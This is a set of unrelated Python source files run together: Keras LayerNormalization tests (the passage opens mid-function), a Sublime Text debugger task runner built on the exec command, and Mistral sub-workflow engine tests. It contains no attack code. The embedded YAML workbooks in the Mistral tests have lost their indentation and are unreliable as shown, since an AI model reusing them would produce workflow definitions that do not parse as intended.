    x = (np.random.normal(loc=5.0, scale=10.0, size=(1000, 2, 2, 2))
         .astype(dtype))
    model.fit(x, x, epochs=4, verbose=0)
    out = model.predict(x)
    # Undo the learned affine transform before checking the statistics.
    out -= keras.backend.eval(norm.beta)
    out /= keras.backend.eval(norm.gamma)

    np.testing.assert_allclose(out.mean(), 0.0, atol=1e-1)
    np.testing.assert_allclose(out.std(), 1.0, atol=1e-1)
class LayerNormalizationTest(keras_parameterized.TestCase):
    """API-level tests for LayerNormalization: constructor arguments, weight
    creation, regularizers/constraints, error cases and fused-path selection."""

    @keras_parameterized.run_all_keras_modes
    def test_basic_layernorm(self):
        # Exercise the layer through the generic layer_test harness with a
        # variety of constructor arguments and input ranks.
        testing_utils.layer_test(
            keras.layers.LayerNormalization,
            kwargs={
                'gamma_regularizer': keras.regularizers.l2(0.01),
                'beta_regularizer': keras.regularizers.l2(0.01)
            },
            input_shape=(3, 4, 2))
        testing_utils.layer_test(
            keras.layers.LayerNormalization,
            kwargs={
                'gamma_initializer': 'ones',
                'beta_initializer': 'ones',
            },
            input_shape=(3, 4, 2))
        testing_utils.layer_test(
            keras.layers.LayerNormalization,
            kwargs={'scale': False,
                    'center': False},
            input_shape=(3, 3))
        testing_utils.layer_test(
            keras.layers.LayerNormalization,
            kwargs={'axis': (-3, -2, -1)},
            input_shape=(2, 8, 8, 3))

    @keras_parameterized.run_all_keras_modes
    def test_non_fused_layernorm(self):
        # Axis configurations that do not normalize over the trailing
        # contiguous dimensions, so the fused implementation cannot be used.
        testing_utils.layer_test(
            keras.layers.LayerNormalization,
            kwargs={'axis': -2},
            input_shape=(3, 4, 2))
        testing_utils.layer_test(
            keras.layers.LayerNormalization,
            kwargs={'axis': (-3, -2)},
            input_shape=(2, 8, 8, 3))
        testing_utils.layer_test(
            keras.layers.LayerNormalization,
            kwargs={'axis': (-3, -1)},
            input_shape=(2, 8, 8, 3))

    @combinations.generate(combinations.combine(mode=['graph', 'eager']))
    def test_layernorm_weights(self):
        # Without scale/center the layer owns no weights at all.
        layer = keras.layers.LayerNormalization(scale=False, center=False)
        layer.build((None, 3, 4))

        self.assertEqual(len(layer.trainable_weights), 0)
        self.assertEqual(len(layer.weights), 0)

        # Default configuration creates gamma and beta, both trainable.
        layer = keras.layers.LayerNormalization()
        layer.build((None, 3, 4))

        self.assertEqual(len(layer.trainable_weights), 2)
        self.assertEqual(len(layer.weights), 2)

    @combinations.generate(combinations.combine(mode=['graph', 'eager']))
    def test_layernorm_regularization(self):
        layer = keras.layers.LayerNormalization(
            gamma_regularizer='l1', beta_regularizer='l1')
        layer.build((None, 3, 4))

        # One regularization loss per regularized weight.
        self.assertEqual(len(layer.losses), 2)

        max_norm = keras.constraints.max_norm
        layer = keras.layers.LayerNormalization(
            gamma_constraint=max_norm, beta_constraint=max_norm)
        layer.build((None, 3, 4))

        self.assertEqual(layer.gamma.constraint, max_norm)
        self.assertEqual(layer.beta.constraint, max_norm)

    @keras_parameterized.run_all_keras_modes
    def test_layernorm_convnet_channel_last(self):
        # End-to-end fit on NHWC data; after undoing beta/gamma the per-channel
        # statistics must be standardized.
        model = keras.models.Sequential()
        norm = keras.layers.LayerNormalization(input_shape=(4, 4, 3))
        model.add(norm)
        model.compile(
            loss='mse',
            optimizer=gradient_descent.GradientDescentOptimizer(0.01),
            run_eagerly=testing_utils.should_run_eagerly())

        # centered on 5.0, variance 10.0
        x = np.random.normal(loc=5.0, scale=10.0, size=(1000, 4, 4, 3))
        model.fit(x, x, epochs=4, verbose=0)
        out = model.predict(x)
        out -= np.reshape(keras.backend.eval(norm.beta), (1, 1, 1, 3))
        out /= np.reshape(keras.backend.eval(norm.gamma), (1, 1, 1, 3))

        np.testing.assert_allclose(np.mean(out, axis=(0, 1, 2)), 0.0, atol=1e-1)
        np.testing.assert_allclose(np.std(out, axis=(0, 1, 2)), 1.0, atol=1e-1)

    @keras_parameterized.run_all_keras_modes
    def test_layernorm_correctness(self):
        _run_layernorm_correctness_test(
            normalization.LayerNormalization, dtype='float32')

    @keras_parameterized.run_all_keras_modes
    def test_layernorm_mixed_precision(self):
        _run_layernorm_correctness_test(
            normalization.LayerNormalization, dtype='float16')

    @combinations.generate(combinations.combine(mode=['graph', 'eager']))
    def testIncorrectAxisType(self):
        # `axis` must be an int or a list/tuple of ints.
        with self.assertRaisesRegex(TypeError,
                                    r'Expected an int or a list/tuple of ints'):
            _ = normalization.LayerNormalization(axis={'axis': -1})

    @combinations.generate(combinations.combine(mode=['graph', 'eager']))
    def testInvalidAxis(self):
        # Axis 3 is out of range for a rank-3 input.
        with self.assertRaisesRegex(ValueError, r'Invalid axis: 3'):
            layer_norm = normalization.LayerNormalization(axis=3)
            layer_norm.build(input_shape=(2, 2, 2))

    @combinations.generate(combinations.combine(mode=['graph', 'eager']))
    def testDuplicateAxis(self):
        with self.assertRaisesRegex(ValueError, r'Duplicate axis:'):
            layer_norm = normalization.LayerNormalization(axis=[-1, -1])
            layer_norm.build(input_shape=(2, 2, 2))

    @combinations.generate(combinations.combine(mode=['graph', 'eager']))
    def testFusedAttr(self):
        # Normalizing over the contiguous trailing axes selects the fused path.
        layer_norm = normalization.LayerNormalization(axis=[-2, -1])
        layer_norm.build(input_shape=(2, 2, 2))
        self.assertEqual(layer_norm._fused, True)
class LayerNormalizationNumericsTest(keras_parameterized.TestCase):
    """Tests LayerNormalization has correct and numerically stable outputs."""

    def _expected_layer_norm(self, x, beta, gamma, batch_input_shape, axis,
                             epsilon):
        """Returns the layer norm, which is computed using NumPy."""
        # beta/gamma only span the normalized axes; build a broadcastable shape
        # (size 1 on every non-normalized dimension).
        broadcast_shape = [batch_input_shape[i] if i in axis else 1
                           for i in range(len(batch_input_shape))]
        mean = np.mean(x, axis=axis, keepdims=True)
        var = np.var(x, axis=axis, keepdims=True)
        expected = (x - mean) / np.sqrt(var + epsilon)
        expected *= np.reshape(gamma, broadcast_shape)
        expected += np.reshape(beta, broadcast_shape)
        return expected

    def _test_forward_pass(self, batch_input_shape, axis, fp64_tol=1e-14,
                           fp32_tol=1e-6, fp16_tol=1e-2):
        """Tests the forward pass of layer normalization.

        Args:
          batch_input_shape: The input shape that will be used to test, including
            the batch dimension.
          axis: A list of axises to normalize. Will be passed to the `axis` argument
            of LayerNormalization.
          fp64_tol: The relative and absolute tolerance for float64.
          fp32_tol: The relative and absolute tolerance for float32.
          fp16_tol: The relative and absolute tolerance for float16.
        """
        param_shape = [batch_input_shape[i] for i in axis]
        param_elems = 1
        for dim in param_shape:
            param_elems *= dim
        # Distinct per-element beta/gamma so a mix-up between them would fail.
        beta = np.arange(param_elems, dtype='float64').reshape(param_shape)
        gamma = np.arange(1, param_elems + 1, dtype='float64').reshape(param_shape)
        x = np.random.normal(size=batch_input_shape)

        for epsilon in 1e-12, 1e-3:
            expected = self._expected_layer_norm(x, beta, gamma, batch_input_shape,
                                                 axis, epsilon)
            for dtype in 'float64', 'float32', 'float16':
                norm = normalization.LayerNormalization(
                    axis=axis, dtype=dtype, batch_input_shape=batch_input_shape,
                    epsilon=epsilon, beta_initializer=keras.initializers.constant(beta),
                    gamma_initializer=keras.initializers.constant(gamma))
                y = norm(keras.backend.cast(x, dtype))
                actual = keras.backend.eval(y)

                if dtype == 'float64':
                    tol = fp64_tol
                elif dtype == 'float32':
                    tol = fp32_tol
                else:
                    assert dtype == 'float16'
                    tol = fp16_tol

                # We use absolute tolerances in addition to relative tolerances, because
                # some of the values are very close to zero.
                self.assertAllClose(expected, actual, rtol=tol, atol=tol)

    @combinations.generate(combinations.combine(mode=['graph', 'eager']))
    def test_forward(self):
        # For numeric stability, we ensure the axis's dimension(s) have at least 4
        # elements.
        self._test_forward_pass((4, 3), (0,))
        self._test_forward_pass((3, 4), (1,))
        self._test_forward_pass((4, 3, 2), (0,))
        self._test_forward_pass((2, 4, 2), (1,))
        self._test_forward_pass((2, 3, 4), (2,), fp16_tol=5e-2)
        self._test_forward_pass((2, 3, 2), (0, 2))
        self._test_forward_pass((2, 2, 2, 2), (1, 3))
        self._test_forward_pass((2, 2, 2, 2), (2, 3))
        self._test_forward_pass((2, 3, 4, 5), (3,))

    def _test_backward_pass(self, batch_input_shape, axis, fp64_tol=1e-5,
                            fp32_tol=1e-5, fp16_tol=2e-2):
        """Tests the backwards pass of layer normalization.

        Args:
          batch_input_shape: The input shape that will be used to test, including
            the batch dimension.
          axis: A list of axises to normalize. Will be passed to the `axis` argument
            of LayerNormalization.
          fp64_tol: The relative and absolute tolerance for float64.
          fp32_tol: The relative and absolute tolerance for float32.
          fp16_tol: The relative and absolute tolerance for float16.
        """
        param_shape = [batch_input_shape[i] for i in axis]
        param_elems = 1
        for dim in param_shape:
            param_elems *= dim
        beta = np.arange(param_elems, dtype='float64').reshape(param_shape)
        gamma = np.arange(1, param_elems + 1, dtype='float64').reshape(param_shape)
        x = np.random.normal(size=batch_input_shape)

        for epsilon in 1e-12, 1e-3:
            # Float64 must come first in this list, as we use the float64 numerical
            # gradients to compare to the float32 and float16 symbolic gradients as
            # well. Computing float32/float16 numerical gradients is too numerically
            # unstable.
            for dtype in 'float64', 'float32', 'float16':
                norm = normalization.LayerNormalization(
                    axis=axis, dtype=dtype, batch_input_shape=batch_input_shape,
                    epsilon=epsilon, beta_initializer=keras.initializers.constant(beta),
                    gamma_initializer=keras.initializers.constant(gamma))
                norm.build(x.shape)

                # pylint: disable=cell-var-from-loop
                def forward_fn(x, beta, gamma):
                    # We must monkey-patch the attributes of `norm` with the function
                    # arguments, so that the gradient checker will properly compute their
                    # gradients. The gradient checker computes gradients with respect to
                    # the input arguments of `f`.
                    with test.mock.patch.object(norm, 'beta', beta):
                        with test.mock.patch.object(norm, 'gamma', gamma):
                            return norm(x)
                # pylint: enable=cell-var-from-loop
                results = gradient_checker_v2.compute_gradient(
                    forward_fn, [keras.backend.cast(x, dtype), norm.beta, norm.gamma])
                ([x_grad_t, beta_grad_t, gamma_grad_t],
                 [x_grad_n, beta_grad_n, gamma_grad_n]) = results

                if dtype == 'float64':
                    # We use the float64 numeric gradients as the reference, to compare
                    # against the symbolic gradients for all dtypes.
                    x_grad_ref = x_grad_n
                    beta_grad_ref = beta_grad_n
                    gamma_grad_ref = gamma_grad_n
                    tol = fp64_tol
                elif dtype == 'float32':
                    tol = fp32_tol
                else:
                    assert dtype == 'float16'
                    tol = fp16_tol

                # We use absolute tolerances in addition to relative tolerances, because
                # some of the values are very close to zero.
                self.assertAllClose(x_grad_t, x_grad_ref, rtol=tol, atol=tol)
                self.assertAllClose(beta_grad_t, beta_grad_ref, rtol=tol, atol=tol)
                self.assertAllClose(gamma_grad_t, gamma_grad_ref, rtol=tol, atol=tol)

    # The gradient_checker_v2 does not work properly with LayerNorm in graph mode.
    @testing_utils.run_v2_only
    def test_backward(self):
        # For numeric stability, we ensure the axis's dimension(s) have at least 4
        # elements.
        self._test_backward_pass((4, 3), (0,))
        self._test_backward_pass((2, 4, 2), (1,))
        self._test_backward_pass((2, 3, 4), (2,))
        self._test_backward_pass((2, 3, 2), (0, 2), fp64_tol=5e-4, fp32_tol=5e-4)
        self._test_backward_pass((2, 2, 2, 2), (1, 3))
        self._test_backward_pass((2, 2, 2, 2), (2, 3))
# Standard TensorFlow test entry point.
if __name__ == '__main__':
    test.main()
|
|
from __future__ import annotations
from dataclasses import dataclass
from typing import Dict, Any, List, TypedDict, Callable
import re
import sublime
import Default #type: ignore
import time
from .import core
from .import dap
from .panel import OutputPanel
from .output_view import OutputView
@dataclass
class Problem:
    """A single build problem (message + the source location it refers to)."""
    message: str
    source: dap.SourceLocation
class Position(TypedDict):
    """A line/character position inside a file; `character` may be unknown."""
    line: int
    character: int|None
class Range(TypedDict):
    """A range with only a start position (no `end` key is ever produced here)."""
    start: Position
class Diagnostic(TypedDict):
    """One diagnostic entry; severity 1 is used for errors (see on_updated_errors)."""
    range: Range
    severity: int
    message: str
class Diagnostics(TypedDict):
    """All diagnostics collected for one file; `base` is always None here."""
    file: str
    base: str|None
    errors: list[Diagnostic]
class TerminalTask:
    """Runs a single `dap.TaskExpanded` through Sublime's built-in `exec`
    command, mirroring its output into an OutputView and collecting reported
    build errors as diagnostics."""

    def __init__(self, window: sublime.Window, task: dap.TaskExpanded, on_closed: Callable[[], None]):
        arguments = task.copy()

        # Pick a display name: explicit 'name', else the command string, else
        # the first element of a command list, else a placeholder.
        name: str

        cmd: str|list[str]|None = arguments.get('cmd')
        if 'name' in arguments:
            name = arguments['name']
        elif isinstance(cmd, str):
            name = cmd
        elif isinstance(cmd, list):
            name = cmd and cmd[0] #type: ignore
        else:
            name = 'Untitled'

        self.background = arguments.get('background', False)
        self.name = name
        self.view = OutputView(window, 'Task', on_closed)
        self.finished = False

        # if we don't remove these additional arguments Default.exec.ExecCommand will be unhappy
        if 'name' in arguments:
            del arguments['name']
        if 'background' in arguments:
            del arguments['background']
        if '$' in arguments:
            del arguments['$']

        self.on_problems_updated: core.Event[None] = core.Event()
        self.diagnostics_per_file: list[Diagnostics] = []

        # Resolved/cancelled/failed by on_finished once the process ends.
        self.future: core.Future[None] = core.Future()
        self.window = window

        # only save the views that have an assigned file
        for view in self.window.views():
            if view.file_name() and view.is_dirty():
                view.run_command('save')

        self.panel = OutputPanel(self.window, name, show_panel=False)
        self.command = Exec(self.window)
        # Redirect exec's output into our hidden panel's view.
        self.command.output_view = self.panel.view
        self.command.run(self, arguments)
        self.on_view_load_listener = core.on_view_load.add(self.on_view_load)

    def show_backing_panel(self):
        # Reveal the hidden output panel that backs this task.
        self.panel.open()

    def on_view_load(self, view: sublime.View):
        # refresh the phantoms from exec
        self.command.update_annotations()

    def dispose(self):
        # Best-effort kill of the underlying process, then tear down the UI.
        try:
            self.command.proc.kill()
        except Exception as e:
            core.log_exception(e)

        self.command.hide_annotations()
        self.on_view_load_listener.dispose()
        self.panel.dispose()
        self.view.dispose()

    def write_stdout(self, text: str):
        self.view.write(text)

    async def wait(self) -> None:
        """Waits for the task to finish; on cancellation asks exec to kill
        the process before re-raising."""
        try:
            await self.future
        except core.CancelledError as e:
            print(f'Command cancelled {self.name}')
            self.command.run(self, {
                'kill': True
            })
            raise e

    def on_output(self, characters: str):
        # Called by Exec for every chunk of process output.
        self.write_stdout(characters)

    def on_updated_errors(self, errors_by_file):
        # `errors_by_file` comes from Default/exec.py — presumably a mapping of
        # file name to (line, column, message) tuples; verify against exec.py.
        self.diagnostics_per_file.clear()
        for file, errors in errors_by_file.items():
            diagnostics: list[Diagnostic] = []
            for error in errors:
                diagnostic: Diagnostic = {
                    'severity': 1,
                    'message': error[2],
                    'range': {
                        'start': {
                            'line': error[0],
                            'character': error[1]
                        }
                    }
                }
                diagnostics.append(diagnostic)

            self.diagnostics_per_file.append({
                'file': file,
                'base': None,
                'errors': diagnostics
            })
        self.on_problems_updated.post()

    def on_finished(self, exit_code: int|None, exit_status: str):
        """Called by Exec when the process ends; resolves `self.future`
        (None exit code => cancelled, 0 => success, else failure)."""
        self.finished = True
        self.exit_code = exit_code
        self.exit_status = exit_status
        if self.future.done():
            return

        if exit_code is None:
            self.future.cancel()
        elif exit_code == 0:
            self.future.set_result(None)
        else:
            self.future.set_exception(core.Error(f'Command {self.name} failed with exit_code {exit_code}'))
class Exec(Default.exec.ExecCommand):
    """Subclass of Sublime's built-in exec command that forwards process
    output, error annotations and the final exit status to the owning
    TerminalTask instead of the default build-results panel."""

    def run(self, instance: TerminalTask, args: Any):
        self.instance = instance

        panel = self.window.active_panel()
        super().run(**args)

        # return to previous panel we don't want to show the build results panel
        self.window.run_command("show_panel", {"panel": panel})

    def update_annotations(self):
        super().update_annotations()
        # Forward the parsed errors so the task can publish diagnostics.
        self.instance.on_updated_errors(self.errs_by_file)

    def on_finished(self, proc):
        super().on_finished(proc)

        # modified from Default exec.py
        if self.instance:
            if proc.killed:
                status = "[Cancelled]"
                code: int|None = None
            else:
                elapsed = time.time() - proc.start_time
                # `or 0` maps a None exit code to 0 (treated as success).
                code: int|None = proc.exit_code() or 0
                if code == 0:
                    status = "[Finished in %.1fs]" % elapsed
                else:
                    status = "[Finished in %.1fs with exit code %d]" % (elapsed, code)

            self.instance.on_finished(code, status)

        # self.window.run_command("next_result")

    def write(self, characters: str):
        super().write(characters)
        self.instance.on_output(characters)
class Tasks:
    """Owns the list of terminal tasks and broadcasts lifecycle events
    (added/removed/updated) to interested listeners."""

    tasks: list[TerminalTask]

    added: core.Event[TerminalTask]
    removed: core.Event[TerminalTask]
    updated: core.Event[TerminalTask]

    def __init__(self) -> None:
        self.added = core.Event()
        self.removed = core.Event()
        self.updated = core.Event()
        self.tasks = []

    def is_active(self):
        """Returns True while at least one task has not finished."""
        for task in self.tasks:
            if not task.finished:
                return True
        return False

    @core.schedule
    async def run(self, window: sublime.Window, task: dap.TaskExpanded):
        """Starts `task` in a new terminal and waits for it to complete."""
        def on_closed():
            self.cancel(terminal)

        terminal = TerminalTask(window, task, on_closed)
        terminal.on_problems_updated.add(lambda: self.updated(terminal))

        self.tasks.append(terminal)
        self.added(terminal)

        # The bare `except: raise` the original wrapped around this await was
        # a no-op and has been removed; `finally` alone is sufficient.
        try:
            await terminal.wait()
        finally:
            # Always notify listeners (success, failure or cancellation) so
            # any status UI reflects the final state.
            self.updated(terminal)

    def remove_finished_terminals(self):
        """Closes the output view of every finished task (tasks stay tracked)."""
        for task in self.tasks:
            if task.finished:
                task.view.close()

    def remove_finished(self):
        """Disposes every finished task and drops it from the list.

        Always returns False, matching the original behavior (no `removed`
        event is posted here — callers rely on that).
        """
        for task in self.tasks:
            if task.finished:
                task.dispose()

        self.tasks = list(filter(lambda t: not t.finished, self.tasks))
        return False

    def cancel(self, task: TerminalTask):
        """Untracks `task` (if present), posts `removed` and disposes it."""
        try:
            self.tasks.remove(task)
        except ValueError:
            return

        # todo actually cancel...
        self.removed(task)
        task.dispose()

    def clear(self):
        """Removes and disposes every *finished* task; running tasks are kept.

        Bug fix: the previous implementation looped `while self.tasks` and hit
        `continue` without mutating any state whenever the last task was still
        running, spinning forever. Collect the finished tasks first, then
        remove them, so unfinished tasks are simply skipped.
        """
        for task in [t for t in self.tasks if t.finished]:
            self.tasks.remove(task)
            self.removed(task)
            task.dispose()

    def dispose(self):
        """Removes and disposes every task regardless of state."""
        while self.tasks:
            task = self.tasks.pop()
            self.removed(task)
            task.dispose()
|
|
# Copyright 2014 - Mirantis, Inc.
# Copyright 2015 - StackStorm, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from oslo_config import cfg
from mistral.actions import std_actions
from mistral import context as auth_context
from mistral.db.v2 import api as db_api
from mistral import exceptions as exc
from mistral.services import workbooks as wb_service
from mistral.tests.unit.engine import base
from mistral.workflow import states
# Use the set_default method to set value otherwise in certain test cases
# the change in value is not permanent.
cfg.CONF.set_default('auth_enable', False, group='pecan')
WB1 = """
---
version: '2.0'
name: wb1
workflows:
wf1:
type: reverse
input:
- param1
- param2
output:
final_result: <% $.final_result %>
tasks:
task1:
action: std.echo output=<% $.param1 %>
publish:
result1: <% task(task1).result %>
task2:
action: std.echo output="'<% $.param1 %> & <% $.param2 %>'"
publish:
final_result: <% task(task2).result %>
requires: [task1]
wf2:
type: direct
output:
slogan: <% $.slogan %>
tasks:
task1:
workflow: wf1 param1='Bonnie' param2='Clyde' task_name='task2'
publish:
slogan: "<% task(task1).result.final_result %> is a cool movie!"
"""
WB2 = """
---
version: '2.0'
name: wb2
workflows:
wf1:
type: direct
tasks:
task1:
workflow: wf2
wf2:
type: direct
output:
var1: <% $.does_not_exist %>
tasks:
task1:
action: std.noop
"""
WB3 = """
---
version: '2.0'
name: wb3
workflows:
wf1:
input:
- wf_name
output:
sub_wf_out: <% $.sub_wf_out %>
tasks:
task1:
workflow: <% $.wf_name %>
publish:
sub_wf_out: <% task(task1).result.sub_wf_out %>
wf2:
output:
sub_wf_out: wf2_out
tasks:
task1:
action: std.noop
"""
WB4 = """
---
version: '2.0'
name: wb4
workflows:
wf1:
input:
- wf_name
- inp
output:
sub_wf_out: <% $.sub_wf_out %>
tasks:
task1:
workflow: <% $.wf_name %>
input: <% $.inp %>
publish:
sub_wf_out: <% task(task1).result.sub_wf_out %>
wf2:
input:
- inp
output:
sub_wf_out: <% $.inp %>
tasks:
task1:
action: std.noop
"""
WB5 = """
---
version: '2.0'
name: wb5
workflows:
wf1:
input:
- wf_name
- inp
output:
sub_wf_out: '{{ _.sub_wf_out }}'
tasks:
task1:
workflow: '{{ _.wf_name }}'
input: '{{ _.inp }}'
publish:
sub_wf_out: '{{ task("task1").result.sub_wf_out }}'
wf2:
input:
- inp
output:
sub_wf_out: '{{ _.inp }}'
tasks:
task1:
action: std.noop
"""
WB6 = """
---
version: '2.0'
name: wb6
workflows:
wf1:
tasks:
task1:
workflow: wf2
wf2:
tasks:
task1:
workflow: wf3
wf3:
tasks:
task1:
action: std.noop
"""
class SubworkflowsTest(base.EngineTestCase):
    """Engine tests for static and dynamic sub-workflow execution."""

    def setUp(self):
        super(SubworkflowsTest, self).setUp()

        # Register every workbook the tests below start workflows from.
        wb_service.create_workbook_v2(WB1)
        wb_service.create_workbook_v2(WB2)
        wb_service.create_workbook_v2(WB3)
        wb_service.create_workbook_v2(WB4)
        wb_service.create_workbook_v2(WB5)
        wb_service.create_workbook_v2(WB6)

    def test_subworkflow_success(self):
        """Parent wf2 runs child wf1; outputs and project ids must propagate."""
        wf2_ex = self.engine.start_workflow('wb1.wf2')

        project_id = auth_context.ctx().project_id

        # Execution of 'wf2'.
        self.assertEqual(project_id, wf2_ex.project_id)
        self.assertIsNotNone(wf2_ex)
        self.assertDictEqual({}, wf2_ex.input)
        self.assertDictEqual({'namespace': ''}, wf2_ex.params)

        self._await(lambda: len(db_api.get_workflow_executions()) == 2, 0.5, 5)

        wf_execs = db_api.get_workflow_executions()

        self.assertEqual(2, len(wf_execs))

        # Execution of 'wf1' (fixed: the original comment said 'wf2' here).
        wf1_ex = self._assert_single_item(wf_execs, name='wb1.wf1')
        wf2_ex = self._assert_single_item(wf_execs, name='wb1.wf2')

        self.assertEqual(project_id, wf1_ex.project_id)
        self.assertIsNotNone(wf1_ex.task_execution_id)
        self.assertDictContainsSubset(
            {
                'task_name': 'task2',
                'task_execution_id': wf1_ex.task_execution_id
            },
            wf1_ex.params
        )
        self.assertDictEqual(
            {
                'param1': 'Bonnie',
                'param2': 'Clyde'
            },
            wf1_ex.input
        )

        # Wait till workflow 'wf1' is completed.
        self.await_workflow_success(wf1_ex.id)

        with db_api.transaction():
            wf1_ex = db_api.get_workflow_execution(wf1_ex.id)

            wf1_output = wf1_ex.output

        self.assertDictEqual(
            {'final_result': "'Bonnie & Clyde'"},
            wf1_output
        )

        # Wait till workflow 'wf2' is completed.
        self.await_workflow_success(wf2_ex.id, timeout=4)

        with db_api.transaction():
            wf2_ex = db_api.get_workflow_execution(wf2_ex.id)

            wf2_output = wf2_ex.output

        self.assertDictEqual(
            {'slogan': "'Bonnie & Clyde' is a cool movie!"},
            wf2_output
        )

        # Check project_id in tasks.
        wf1_task_execs = db_api.get_task_executions(
            workflow_execution_id=wf1_ex.id
        )
        wf2_task_execs = db_api.get_task_executions(
            workflow_execution_id=wf2_ex.id
        )

        # Fixed swapped local names: each variable now matches the workflow
        # whose task executions it is taken from (behavior is unchanged, the
        # same three assertions are made).
        wf1_task1_ex = self._assert_single_item(wf1_task_execs, name='task1')
        wf2_task1_ex = self._assert_single_item(wf2_task_execs, name='task1')
        wf1_task2_ex = self._assert_single_item(wf1_task_execs, name='task2')

        self.assertEqual(project_id, wf1_task1_ex.project_id)
        self.assertEqual(project_id, wf2_task1_ex.project_id)
        self.assertEqual(project_id, wf1_task2_ex.project_id)

    @mock.patch.object(std_actions.EchoAction, 'run',
                       mock.MagicMock(side_effect=exc.ActionException))
    def test_subworkflow_error(self):
        """A failing action in the child must propagate ERROR to the parent."""
        self.engine.start_workflow('wb1.wf2')

        self._await(lambda: len(db_api.get_workflow_executions()) == 2, 0.5, 5)

        wf_execs = db_api.get_workflow_executions()

        self.assertEqual(2, len(wf_execs))

        wf1_ex = self._assert_single_item(wf_execs, name='wb1.wf1')
        wf2_ex = self._assert_single_item(wf_execs, name='wb1.wf2')

        # Wait till workflow 'wf1' is completed.
        self.await_workflow_error(wf1_ex.id)

        # Wait till workflow 'wf2' is completed, its state must be ERROR.
        self.await_workflow_error(wf2_ex.id)

    def test_subworkflow_yaql_error(self):
        """A YAQL evaluation error in the child must bubble up to the parent."""
        wf_ex = self.engine.start_workflow('wb2.wf1')

        self.await_workflow_error(wf_ex.id)

        wf_execs = db_api.get_workflow_executions()

        self.assertEqual(2, len(wf_execs))

        wf2_ex = self._assert_single_item(wf_execs, name='wb2.wf2')

        self.assertEqual(states.ERROR, wf2_ex.state)
        self.assertIn('Can not evaluate YAQL expression', wf2_ex.state_info)

        # Ensure error message is bubbled up to the main workflow.
        wf1_ex = self._assert_single_item(wf_execs, name='wb2.wf1')

        self.assertEqual(states.ERROR, wf1_ex.state)
        self.assertIn('Can not evaluate YAQL expression', wf1_ex.state_info)

    def test_subworkflow_environment_inheritance(self):
        """An 'env' passed to the parent must be inherited by the child."""
        env = {'key1': 'abc'}

        wf2_ex = self.engine.start_workflow('wb1.wf2', env=env)

        # Execution of 'wf2'.
        self.assertIsNotNone(wf2_ex)
        self.assertDictEqual({}, wf2_ex.input)
        self.assertDictEqual(
            {'env': env, 'namespace': ''},
            wf2_ex.params
        )

        self._await(lambda: len(db_api.get_workflow_executions()) == 2, 0.5, 5)

        wf_execs = db_api.get_workflow_executions()

        self.assertEqual(2, len(wf_execs))

        # Execution of 'wf1'.
        wf1_ex = self._assert_single_item(wf_execs, name='wb1.wf1')
        wf2_ex = self._assert_single_item(wf_execs, name='wb1.wf2')

        expected_start_params = {
            'task_name': 'task2',
            'task_execution_id': wf1_ex.task_execution_id,
            'env': env
        }

        self.assertIsNotNone(wf1_ex.task_execution_id)
        self.assertDictContainsSubset(expected_start_params, wf1_ex.params)

        # Wait till workflow 'wf1' is completed.
        self.await_workflow_success(wf1_ex.id)

        # Wait till workflow 'wf2' is completed.
        self.await_workflow_success(wf2_ex.id)

    def test_dynamic_subworkflow_wf2(self):
        """Child workflow name resolved from input via a YAQL expression."""
        ex = self.engine.start_workflow('wb3.wf1', wf_input={'wf_name': 'wf2'})

        self.await_workflow_success(ex.id)

        with db_api.transaction():
            ex = db_api.get_workflow_execution(ex.id)

            self.assertEqual({'sub_wf_out': 'wf2_out'}, ex.output)

    def test_dynamic_subworkflow_call_failure(self):
        """Resolving a non-existent workflow name must fail the execution."""
        ex = self.engine.start_workflow(
            'wb3.wf1',
            wf_input={'wf_name': 'not_existing_wf'}
        )

        self.await_workflow_error(ex.id)

        with db_api.transaction():
            ex = db_api.get_workflow_execution(ex.id)

            self.assertIn('not_existing_wf', ex.state_info)

    def test_dynamic_subworkflow_with_generic_input(self):
        self._test_dynamic_workflow_with_dict_param('wb4.wf1')

    def test_dynamic_subworkflow_with_jinja(self):
        self._test_dynamic_workflow_with_dict_param('wb5.wf1')

    def test_string_workflow_input_failure(self):
        """A sub-workflow 'input' must be a dict; a string must be rejected."""
        ex = self.engine.start_workflow(
            'wb4.wf1',
            wf_input={'wf_name': 'wf2', 'inp': 'invalid_string_input'}
        )

        self.await_workflow_error(ex.id)

        with db_api.transaction():
            ex = db_api.get_workflow_execution(ex.id)

            self.assertIn('invalid_string_input', ex.state_info)

    def _test_dynamic_workflow_with_dict_param(self, wf_identifier):
        # Shared driver for the YAQL and Jinja dynamic-input variants.
        ex = self.engine.start_workflow(
            wf_identifier,
            wf_input={'wf_name': 'wf2', 'inp': {'inp': 'abc'}}
        )

        self.await_workflow_success(ex.id)

        with db_api.transaction():
            ex = db_api.get_workflow_execution(ex.id)

            self.assertEqual({'sub_wf_out': 'abc'}, ex.output)

    def test_subworkflow_root_execution_id(self):
        """All nested executions must point at the top-level root execution."""
        self.engine.start_workflow('wb6.wf1')

        self._await(lambda: len(db_api.get_workflow_executions()) == 3, 0.5, 5)

        wf_execs = db_api.get_workflow_executions()

        wf1_ex = self._assert_single_item(wf_execs, name='wb6.wf1')
        wf2_ex = self._assert_single_item(wf_execs, name='wb6.wf2')
        wf3_ex = self._assert_single_item(wf_execs, name='wb6.wf3')

        self.assertEqual(3, len(wf_execs))

        # Wait till workflow 'wf1' is completed (and all the sub-workflows
        # will be completed also).
        self.await_workflow_success(wf1_ex.id)

        with db_api.transaction():
            wf1_ex = db_api.get_workflow_execution(wf1_ex.id)
            wf2_ex = db_api.get_workflow_execution(wf2_ex.id)
            wf3_ex = db_api.get_workflow_execution(wf3_ex.id)

            # Fixed: `assertIsNone(x, None)` was passing None as the `msg`
            # argument — assertIsNone takes only (obj, msg=...).
            self.assertIsNone(wf1_ex.root_execution_id)
            self.assertEqual(wf2_ex.root_execution_id, wf1_ex.id)
            self.assertEqual(wf3_ex.root_execution_id, wf1_ex.id)
|
|
################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
